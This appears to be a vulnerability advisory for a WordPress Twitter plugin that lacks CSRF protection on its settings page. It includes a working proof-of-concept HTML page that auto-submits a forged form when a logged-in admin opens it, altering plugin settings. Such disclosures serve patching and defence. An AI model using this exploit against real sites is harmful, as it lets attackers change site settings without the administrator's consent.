Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Have a logged in admin open an HTML page containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=hl_twitter_settings" method="POST">
<input type="text" name="object[tweet_format]" value="csrf2" />
<input type="text" name="object[auto_tweet]" value="on" />
<input type="text" name="object[archive_slug]" value="csrf2" />
<input type="text" name="object[update_frequency]" value="hl_1hr" />
<input type="submit" name="submit" value="Save" />
</form>
</body>
```